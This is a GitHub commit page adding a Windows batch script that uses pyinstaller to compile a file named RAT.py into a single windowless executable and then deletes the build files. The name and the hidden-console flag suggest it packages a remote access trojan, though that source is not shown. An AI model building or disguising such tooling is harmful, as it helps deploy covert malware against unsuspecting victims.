We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent b674468 commit 48affffCopy full SHA for 48affff
GIFS/compile.bat
@@ -0,0 +1,10 @@
1
+echo off
2
+
3
+pyinstaller --clean --hidden-import=pyttsx3.drivers --hidden-import=pyttsx3.drivers.sapi5 --onefile --noconsole RAT.py
4
5
+del /s /q /f RAT.spec
6
+rmdir /s /q __pycache__
7
+rmdir /s /q build
8
9
+:cmd
10
+pause null
0 commit comments